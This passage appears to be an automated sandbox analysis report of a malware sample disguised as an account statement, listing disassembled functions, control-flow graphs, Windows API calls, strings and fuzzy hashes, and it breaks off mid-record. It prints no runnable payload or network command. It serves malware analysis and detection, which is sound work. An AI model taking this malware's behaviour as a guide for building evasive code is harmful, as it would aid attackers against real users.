1824 67b5de1-67b5de4 1819->1824 1820->1819 1829 67b5dfa-67b5dfc 1824->1829 1830 67b5de6-67b5df5 1824->1830 1834 67b5dfe 1829->1834 1835 67b5e03-67b5e06 1829->1835 1830->1829 1834->1835 1835->1786 1835->1836 1838->1839 1839->1758
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XPbq$\Obq
                                                  • API String ID: 0-409418754
                                                  • Opcode ID: 2176a62c9a7e5e39835a2f147264a1575b2e6d0d5bbf428a4b511fa0482501ec
                                                  • Instruction ID: ea812cbd468d71f56fc698b588f9844394c3587e23bf415730e6c6320998f9d1
                                                  • Opcode Fuzzy Hash: 2176a62c9a7e5e39835a2f147264a1575b2e6d0d5bbf428a4b511fa0482501ec
                                                  • Instruction Fuzzy Hash: E1D1F331B101158FEF64DF68D4947AEBBE2FB89720F24956AE40ADB352CA31DC418B90
                                                  Function 067B51E8 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 5f616dae3b85c9fabd9e15a9e7271af237245295c514117a23d84681988a2e46
                                                  • Instruction ID: e28509ad2c5ee22d56f2dd7303c5f8a2a978a1efd92bcb27ea1b3c7f40cddc94
                                                  • Opcode Fuzzy Hash: 5f616dae3b85c9fabd9e15a9e7271af237245295c514117a23d84681988a2e46
                                                  • Instruction Fuzzy Hash: 6A22AE71E002198FEF64DFA4C5807EEBBB2EF85314F248469E449AB385DA75DC42CB91
                                                  Function 067B6238 Relevance: .8, Instructions: 825COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c0b645b2bd903d32ba5b7ea9fedd8847aee46d06db4ae036e2f84c6995f17e2
                                                  • Instruction ID: c14d97f9ae7350e069bc40661cbe83e2479d5dbb9804bbe94045bfee7fc0e460
                                                  • Opcode Fuzzy Hash: 6c0b645b2bd903d32ba5b7ea9fedd8847aee46d06db4ae036e2f84c6995f17e2
                                                  • Instruction Fuzzy Hash: 0962AD34A002088FDB64DB68D594BEDB7F2EF88314F149929E506EB395DB35ED46CB80
                                                  Function 067BC1D8 Relevance: .6, Instructions: 643COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c45f815c47791b93cced3bb33b259369b3fcadceb57260f6ce9827693d551a9a
                                                  • Instruction ID: e4ad3dafe577fb6f1556930b93bb438e0e5e41dfe69ce7d646294e782b192946
                                                  • Opcode Fuzzy Hash: c45f815c47791b93cced3bb33b259369b3fcadceb57260f6ce9827693d551a9a
                                                  • Instruction Fuzzy Hash: BA32BD34B102098FDB65DB68D984BEEBBB6EF88314F109525E409EB355DB34EC42CB91
                                                  Function 06756E41 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 580 6756e41-6756e42 581 6756e44-6756e48 580->581 582 6756e4a-6756e4c 580->582 581->582 583 6756e51-6756edf GetCurrentProcess 581->583 582->583 588 6756ee1-6756ee7 583->588 589 6756ee8-6756f1c GetCurrentThread 583->589 588->589 590 6756f25-6756f59 GetCurrentProcess 589->590 591 6756f1e-6756f24 589->591 593 6756f62-6756f7d call 6757020 590->593 594 6756f5b-6756f61 590->594 591->590 597 6756f83-6756fb2 GetCurrentThreadId 593->597 594->593 598 6756fb4-6756fba 597->598 599 6756fbb-675701d 597->599 598->599
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06756ECE
                                                  • GetCurrentThread.KERNEL32 ref: 06756F0B
                                                  • GetCurrentProcess.KERNEL32 ref: 06756F48
                                                  • GetCurrentThreadId.KERNEL32 ref: 06756FA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: d14cb0d4e2a06fdcf82a979d513bf34d67aa3460bb0da92626229dac1a874cff
                                                  • Instruction ID: 5c04b182fd9b6e599550fb3cbfa4cb235e8f3db1de89cf61f271466b636c495b
                                                  • Opcode Fuzzy Hash: d14cb0d4e2a06fdcf82a979d513bf34d67aa3460bb0da92626229dac1a874cff
                                                  • Instruction Fuzzy Hash: DA5169B0D003498FDB54DFAAD948BAEBBF1FF49304F208469E409A72A0D7749944CF62
                                                  Function 06756E50 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 606 6756e50-6756edf GetCurrentProcess 611 6756ee1-6756ee7 606->611 612 6756ee8-6756f1c GetCurrentThread 606->612 611->612 613 6756f25-6756f59 GetCurrentProcess 612->613 614 6756f1e-6756f24 612->614 616 6756f62-6756f7d call 6757020 613->616 617 6756f5b-6756f61 613->617 614->613 620 6756f83-6756fb2 GetCurrentThreadId 616->620 617->616 621 6756fb4-6756fba 620->621 622 6756fbb-675701d 620->622 621->622
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06756ECE
                                                  • GetCurrentThread.KERNEL32 ref: 06756F0B
                                                  • GetCurrentProcess.KERNEL32 ref: 06756F48
                                                  • GetCurrentThreadId.KERNEL32 ref: 06756FA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 5d0f1592e6cfb8638b5e4e198812838da29f6abc9ae2561ba8a183dfa6a66807
                                                  • Instruction ID: 7346dbf40269ca03b2369585ee01fb05e81b376fc4f24258f540e049873b7477
                                                  • Opcode Fuzzy Hash: 5d0f1592e6cfb8638b5e4e198812838da29f6abc9ae2561ba8a183dfa6a66807
                                                  • Instruction Fuzzy Hash: 045158B0D003498FDB54DFAAD948BAEBBF1EF49304F208469E409A72A0D7749944CF65
                                                  Function 067B8D98 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 629 67b8d98-67b8dbd 631 67b8dbf-67b8dc2 629->631 632 67b8dc8-67b8ddd 631->632 633 67b9680-67b9683 631->633 639 67b8ddf-67b8de5 632->639 640 67b8df5-67b8e0b 632->640 634 67b96a9-67b96ab 633->634 635 67b9685-67b96a4 633->635 636 67b96ad 634->636 637 67b96b2-67b96b5 634->637 635->634 636->637 637->631 642 67b96bb-67b96c5 637->642 643 67b8de9-67b8deb 639->643 644 67b8de7 639->644 647 67b8e16-67b8e18 640->647 643->640 644->640 648 67b8e1a-67b8e20 647->648 649 67b8e30-67b8ea1 647->649 650 67b8e22 648->650 651 67b8e24-67b8e26 648->651 660 67b8ecd-67b8ee9 649->660 661 67b8ea3-67b8ec6 649->661 650->649 651->649 666 67b8eeb-67b8f0e 660->666 667 67b8f15-67b8f30 660->667 661->660 666->667 672 67b8f5b-67b8f76 667->672 673 67b8f32-67b8f54 667->673 678 67b8f9b-67b8fa9 672->678 679 67b8f78-67b8f94 672->679 673->672 680 67b8fab-67b8fb4 678->680 681 67b8fb9-67b9033 678->681 679->678 680->642 687 67b9080-67b9095 681->687 688 67b9035-67b9053 681->688 687->633 692 67b906f-67b907e 688->692 693 67b9055-67b9064 688->693 692->687 692->688 693->692
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: d2f9bcda04f5887da4a615c7b2e9eec1523a8525eea561bbb6a5b3855479b09b
                                                  • Instruction ID: 9491c0e00c36b38a05b25a02adbe37f943808c32b5334d80d83605ae80d1093d
                                                  • Opcode Fuzzy Hash: d2f9bcda04f5887da4a615c7b2e9eec1523a8525eea561bbb6a5b3855479b09b
                                                  • Instruction Fuzzy Hash: 40916030B0020A8FDB54DF65D954BAEB3F6BF89204F108566D809DB748EF309D46CB92
                                                  Function 067BCFA0 Relevance: 4.6, Strings: 3, Instructions: 804COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 696 67bcfa0-67bcfbb 698 67bcfbd-67bcfc0 696->698 699 67bd009-67bd00c 698->699 700 67bcfc2-67bd004 698->700 701 67bd00e-67bd050 699->701 702 67bd055-67bd058 699->702 700->699 701->702 704 67bd05a-67bd070 702->704 705 67bd075-67bd078 702->705 704->705 707 67bd07a-67bd089 705->707 708 67bd0c1-67bd0c4 705->708 709 67bd08b-67bd090 707->709 710 67bd098-67bd0a4 707->710 712 67bd10d-67bd110 708->712 713 67bd0c6-67bd108 708->713 709->710 716 67bd0aa-67bd0bc 710->716 717 67bd9bd-67bd9ca 710->717 718 67bd159-67bd15c 712->718 719 67bd112-67bd154 712->719 713->712 716->708 736 67bd9cc 717->736 737 67bd9d2 717->737 720 67bd48c-67bd498 718->720 721 67bd162-67bd165 718->721 719->718 720->707 731 67bd49e-67bd78b 720->731 725 67bd1ae-67bd1b1 721->725 726 67bd167-67bd1a9 721->726 734 67bd1bb-67bd1be 725->734 735 67bd1b3-67bd1b8 725->735 726->725 919 67bd9b2-67bd9bc 731->919 920 67bd791-67bd797 731->920 738 67bd1c0-67bd1cf 734->738 739 67bd207-67bd20a 734->739 735->734 740 67bd9ce 736->740 741 67bd9dc 736->741 743 67bd9da-67bd9db 737->743 744 67bd9d4 737->744 748 67bd1de-67bd1ea 738->748 749 67bd1d1-67bd1d6 738->749 752 67bd20c-67bd24e 739->752 753 67bd253-67bd256 739->753 750 67bd9d0-67bd9d1 740->750 751 67bd9d6 740->751 754 67bd9dd-67bd9f6 741->754 743->741 744->751 748->717 757 67bd1f0-67bd202 748->757 749->748 750->737 751->754 763 67bd9d8-67bd9d9 751->763 752->753 761 67bd279-67bd27c 753->761 762 67bd258-67bd274 753->762 765 67bd9f8-67bd9fb 754->765 757->739 768 67bd28b-67bd28e 761->768 769 67bd27e-67bd280 761->769 762->761 763->743 770 67bda0a-67bda0d 765->770 771 67bd9fd 765->771 779 67bd290-67bd2d2 768->779 780 67bd2d7-67bd2da 768->780 777 67bd347-67bd350 769->777 778 67bd286 769->778 781 67bda0f-67bda2b 770->781 782 67bda30-67bda33 770->782 966 67bd9fd call 67bdb28 771->966 967 67bd9fd call 67bdb1f 771->967 968 67bd9fd call 67bdb15 771->968 789 67bd35f-67bd36b 777->789 790 67bd352-67bd357 777->790 778->768 779->780 786 67bd2e9-67bd2ec 780->786 787 67bd2dc-67bd2de 780->787 781->782 784 67bda66-67bda68 782->784 785 67bda35-67bda61 782->785 793 67bda6a 784->793 794 67bda6f-67bda72 784->794 785->784 797 67bd2ee-67bd330 786->797 798 67bd335-67bd337 786->798 795 67bd489 787->795 796 67bd2e4 787->796 803 67bd47c-67bd481 789->803 804 67bd371-67bd385 789->804 790->789 791 67bda03-67bda05 791->770 793->794 794->765 806 67bda74-67bda83 794->806 795->720 796->786 797->798 808 67bd339 798->808 809 67bd33e-67bd341 798->809 803->795 804->795 817 67bd38b-67bd39d 804->817 821 67bdaea-67bdaff 806->821 822 67bda85-67bdae8 call 67b61e8 806->822 808->809 809->698 809->777 828 67bd39f-67bd3a5 817->828 829 67bd3c1-67bd3c3 817->829 822->821 834 67bd3a9-67bd3b5 828->834 835 67bd3a7 828->835 839 67bd3cd-67bd3d9 829->839 837 67bd3b7-67bd3bf 834->837 835->837 837->839 849 67bd3db-67bd3e5 839->849 850 67bd3e7 839->850 852 67bd3ec-67bd3ee 849->852 850->852 852->795 854 67bd3f4-67bd410 call 67b61e8 852->854 863 67bd41f-67bd42b 854->863 864 67bd412-67bd417 854->864 863->803 866 67bd42d-67bd47a 863->866 864->863 866->795 921 67bd799-67bd79e 920->921 922 67bd7a6-67bd7af 920->922 921->922 922->717 923 67bd7b5-67bd7c8 922->923 925 67bd7ce-67bd7d4 923->925 926 67bd9a2-67bd9ac 923->926 927 67bd7e3-67bd7ec 925->927 928 67bd7d6-67bd7db 925->928 926->919 926->920 927->717 929 67bd7f2-67bd813 927->929 928->927 932 67bd822-67bd82b 929->932 933 67bd815-67bd81a 929->933 932->717 934 67bd831-67bd84e 932->934 933->932 934->926 937 67bd854-67bd85a 934->937 937->717 938 67bd860-67bd879 937->938 940 67bd87f-67bd8a6 938->940 941 67bd995-67bd99c 938->941 940->717 944 67bd8ac-67bd8b6 940->944 941->926 941->937 944->717 945 67bd8bc-67bd8d3 944->945 947 67bd8e2-67bd8fd 945->947 948 67bd8d5-67bd8e0 945->948 947->941 953 67bd903-67bd91c call 67b61e8 947->953 948->947 957 67bd92b-67bd934 953->957 958 67bd91e-67bd923 953->958 957->717 959 67bd93a-67bd98e 957->959 958->957 959->941 966->791 967->791 968->791
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909
                                                  • Opcode ID: d1117a4d67fc0d77642dce1f3c563dc857560666e15999387de95793c97d26b3
                                                  • Instruction ID: 4b413d5dbe9dc23e9ce24e44e5d11a3cd116ed5ff488cf69185a9736fe28b854
                                                  • Opcode Fuzzy Hash: d1117a4d67fc0d77642dce1f3c563dc857560666e15999387de95793c97d26b3
                                                  • Instruction Fuzzy Hash: 06625F3070020A8FCB65EF68D690A9DB7E6FF85304F209A29D0099F759DB75ED46CB81
                                                  Function 067B47B0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 67b47b0-67b47d4 971 67b47d6-67b47d9 969->971 972 67b47db-67b47f5 971->972 973 67b47fa-67b47fd 971->973 972->973 974 67b4edc-67b4ede 973->974 975 67b4803-67b48fb 973->975 977 67b4ee0 974->977 978 67b4ee5-67b4ee8 974->978 993 67b497e-67b4985 975->993 994 67b4901-67b4949 975->994 977->978 978->971 979 67b4eee-67b4efb 978->979 995 67b498b-67b49fb 993->995 996 67b4a09-67b4a12 993->996 1015 67b494e call 67b5068 994->1015 1016 67b494e call 67b5058 994->1016 1013 67b49fd 995->1013 1014 67b4a06 995->1014 996->979 1007 67b4954-67b4970 1011 67b497b 1007->1011 1012 67b4972 1007->1012 1011->993 1012->1011 1013->1014 1014->996 1015->1007 1016->1007
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190
                                                  • Opcode ID: 649e6d4c601336d8dd9ecf27421ad374bb2d0b92bcbfbf5073870699603e87c6
                                                  • Instruction ID: 4cc5c6ed604200b000610c0cfd6536d1a6f3611e80ba7734d0da4995723c7a84
                                                  • Opcode Fuzzy Hash: 649e6d4c601336d8dd9ecf27421ad374bb2d0b92bcbfbf5073870699603e87c6
                                                  • Instruction Fuzzy Hash: 72617230F002099FEF549FA9C8557AEBBF6FB88700F208429E106AB399DB758D459F51
                                                  Function 067B8D89 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1952 67b8d89-67b8d8e 1953 67b8d90-67b8d94 1952->1953 1954 67b8d96 1952->1954 1953->1954 1956 67b8d98-67b8d9c 1954->1956 1957 67b8d9d-67b8dbd 1954->1957 1956->1957 1958 67b8dbf-67b8dc2 1957->1958 1959 67b8dc8-67b8ddd 1958->1959 1960 67b9680-67b9683 1958->1960 1966 67b8ddf-67b8de5 1959->1966 1967 67b8df5-67b8e0b 1959->1967 1961 67b96a9-67b96ab 1960->1961 1962 67b9685-67b96a4 1960->1962 1963 67b96ad 1961->1963 1964 67b96b2-67b96b5 1961->1964 1962->1961 1963->1964 1964->1958 1969 67b96bb-67b96c5 1964->1969 1970 67b8de9-67b8deb 1966->1970 1971 67b8de7 1966->1971 1974 67b8e16-67b8e18 1967->1974 1970->1967 1971->1967 1975 67b8e1a-67b8e20 1974->1975 1976 67b8e30-67b8ea1 1974->1976 1977 67b8e22 1975->1977 1978 67b8e24-67b8e26 1975->1978 1987 67b8ecd-67b8ee9 1976->1987 1988 67b8ea3-67b8ec6 1976->1988 1977->1976 1978->1976 1993 67b8eeb-67b8f0e 1987->1993 1994 67b8f15-67b8f30 1987->1994 1988->1987 1993->1994 1999 67b8f5b-67b8f76 1994->1999 2000 67b8f32-67b8f54 1994->2000 2005 67b8f9b-67b8fa9 1999->2005 2006 67b8f78-67b8f94 1999->2006 2000->1999 2007 67b8fab-67b8fb4 2005->2007 2008 67b8fb9-67b9033 2005->2008 2006->2005 2007->1969 2014 67b9080-67b9095 2008->2014 2015 67b9035-67b9053 2008->2015 2014->1960 2019 67b906f-67b907e 2015->2019 2020 67b9055-67b9064 2015->2020 2019->2014 2019->2015 2020->2019
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 1d11bf8f903d302c5e6984e7cdbc49bc841b821aefce46e8b4b7ad4a4de517a6
                                                  • Instruction ID: a1a06c0d8ec74dfff6ad6fdf7f7f7c9576aea486b93be18f5f8662eef4e01bc7
                                                  • Opcode Fuzzy Hash: 1d11bf8f903d302c5e6984e7cdbc49bc841b821aefce46e8b4b7ad4a4de517a6
                                                  • Instruction Fuzzy Hash: 12515230B001059FDB55DB74D954BAEB3F6AFC9648F10846AD909EB758EE30EC06CB92
                                                  Function 067B47A0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2023 67b47a0-67b47a2 2024 67b47aa-67b47ac 2023->2024 2025 67b47a4-67b47a8 2023->2025 2027 67b47ae 2024->2027 2028 67b4801 2024->2028 2025->2024 2030 67b47b0-67b47b4 2027->2030 2031 67b47b5-67b47d4 2027->2031 2029 67b4808-67b48fb 2028->2029 2053 67b497e-67b4985 2029->2053 2054 67b4901-67b4949 2029->2054 2030->2031 2032 67b47d6-67b47d9 2031->2032 2033 67b47db-67b47f5 2032->2033 2034 67b47fa-67b47fd 2032->2034 2033->2034 2036 67b4edc-67b4ede 2034->2036 2037 67b4803 2034->2037 2039 67b4ee0 2036->2039 2040 67b4ee5-67b4ee8 2036->2040 2037->2029 2039->2040 2040->2032 2042 67b4eee-67b4efb 2040->2042 2055 67b498b-67b49fb 2053->2055 2056 67b4a09-67b4a12 2053->2056 2075 67b494e call 67b5068 2054->2075 2076 67b494e call 67b5058 2054->2076 2073 67b49fd 2055->2073 2074 67b4a06 2055->2074 2056->2042 2067 67b4954-67b4970 2071 67b497b 2067->2071 2072 67b4972 2067->2072 2071->2053 2072->2071 2073->2074 2074->2056 2075->2067 2076->2067
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095
                                                  • Opcode ID: 95f060130537c215f12033379cc4fc406ebb8ae92bfe32c9d0118c2f7784574c
                                                  • Instruction ID: b74cf9d2522a0b77ff1c35e39c9c319ed5fbee2b771f89b36eab45ac0b27a638
                                                  • Opcode Fuzzy Hash: 95f060130537c215f12033379cc4fc406ebb8ae92bfe32c9d0118c2f7784574c
                                                  • Instruction Fuzzy Hash: 26516231F002089FEB549FA5C8557AEBBF6FF89700F208529E105AB399DB759C01DB91
                                                  Function 067533E1 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2303 67533e1-67533e2 2304 67533e4-67533e8 2303->2304 2305 67533ea 2303->2305 2304->2305 2306 67533f2-67533fa 2305->2306 2307 67533ec-67533ed 2305->2307 2310 6753402 2306->2310 2311 67533fc-6753400 2306->2311 2308 6753469-67534be 2307->2308 2312 67534c0-67534c6 2308->2312 2313 67534c9-67534d0 2308->2313 2315 6753404-6753407 2310->2315 2316 675340a-6753438 call 6751d24 2310->2316 2311->2310 2314 67533cb-67533d5 2311->2314 2312->2313 2317 67534d2-67534d8 2313->2317 2318 67534db-675357a CreateWindowExW 2313->2318 2315->2316 2320 675343d-675343e 2316->2320 2317->2318 2322 6753583-67535bb 2318->2322 2323 675357c-6753582 2318->2323 2320->2308 2327 67535bd-67535c0 2322->2327 2328 67535c8 2322->2328 2323->2322 2327->2328 2329 67535c9 2328->2329 2329->2329
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: d58e33a284f8c0401b4707ed1a879aae29f3f398ec4e0503ca06c66226e3937b
                                                  • Instruction ID: e7c0cfe3e63ab1cd4e5d708fe591893cc05710c40ef12a2fd9643e5f3233ec65
                                                  • Opcode Fuzzy Hash: d58e33a284f8c0401b4707ed1a879aae29f3f398ec4e0503ca06c66226e3937b
                                                  • Instruction Fuzzy Hash: E8512471C04249EFDF12CFA9C884AEDBFB2BF49314F1581AAE908AB221D7759845CF40
                                                  Function 00F0F733 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2330 f0f733-f0f738 2331 f0f73a 2330->2331 2332 f0f6fd-f0f6ff 2330->2332 2333 f0f742-f0f743 2331->2333 2334 f0f73c 2331->2334 2335 f0f703-f0f708 2332->2335 2337 f0f745-f0f759 2333->2337 2334->2335 2336 f0f73e 2334->2336 2341 f0f695-f0f69e 2335->2341 2342 f0f709-f0f731 2335->2342 2336->2337 2338 f0f740-f0f741 2336->2338 2349 f0f75b-f0f75e 2337->2349 2350 f0f75f-f0f776 2337->2350 2338->2333 2343 f0f6a0-f0f6a4 2341->2343 2344 f0f6a5-f0f6ab 2341->2344 2343->2344 2346 f0f6d5-f0f6eb 2344->2346 2347 f0f6ad-f0f6d4 2344->2347 2366 f0f6ed call f0f733 2346->2366 2367 f0f6ed call f0f778 2346->2367 2357 f0f778-f0f77c 2350->2357 2358 f0f77d-f0f7ec GlobalMemoryStatusEx 2350->2358 2356 f0f6f2-f0f6f4 2359 f0f6f6-f0f6f9 2356->2359 2360 f0f6fa-f0f6ff 2356->2360 2357->2358 2362 f0f7f5-f0f81d 2358->2362 2363 f0f7ee-f0f7f4 2358->2363 2360->2342 2363->2362 2366->2356 2367->2356
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00F0F7DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 7874e304dfc6c9c76118c0c10fcfc05020e993066089a7ccb7e6c24bb95ee1d8
                                                  • Instruction ID: 3d6e79580aedf93f343b8d7b7100ccae41eb59d4709e579d39d5fa0107ccd7e8
                                                  • Opcode Fuzzy Hash: 7874e304dfc6c9c76118c0c10fcfc05020e993066089a7ccb7e6c24bb95ee1d8
                                                  • Instruction Fuzzy Hash: A6413931D043958FCB24CFB9C84429ABFF5AF85310F188166D404A7691DB789C48DBE1
                                                  Function 0675344D Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2368 675344d-675344e 2369 6753456 2368->2369 2370 6753450-6753454 2368->2370 2372 675345e-67534be 2369->2372 2373 6753458-675345d 2369->2373 2370->2369 2375 67534c0-67534c6 2372->2375 2376 67534c9-67534d0 2372->2376 2373->2372 2375->2376 2377 67534d2-67534d8 2376->2377 2378 67534db-6753513 2376->2378 2377->2378 2379 675351b-675357a CreateWindowExW 2378->2379 2380 6753583-67535bb 2379->2380 2381 675357c-6753582 2379->2381 2385 67535bd-67535c0 2380->2385 2386 67535c8 2380->2386 2381->2380 2385->2386 2387 67535c9 2386->2387 2387->2387
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 0cd05af33e740afecde6d6f7b32ae1b1fca1af3995402ec6394ef62c1f6718f3
                                                  • Instruction ID: 761764aee899e62e31a82c56fd6217b3a8db697ca16f4db365c28cfa137bd6b0
                                                  • Opcode Fuzzy Hash: 0cd05af33e740afecde6d6f7b32ae1b1fca1af3995402ec6394ef62c1f6718f3
                                                  • Instruction Fuzzy Hash: 9F51C4B1D00309DFDB15CFA9C884AEEBBF5BF48350F25816AE919AB210D7759885CF90
                                                  Function 06753458 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 5eb815a682686d8b53742bb9cccc9dd20ea2e07912839ab66a2e07a82235ae3e
                                                  • Instruction ID: 28c6e2b4a4162ef14f91a17353ea98ca40ddc5416afd79d8a6dad12e6b99aa46
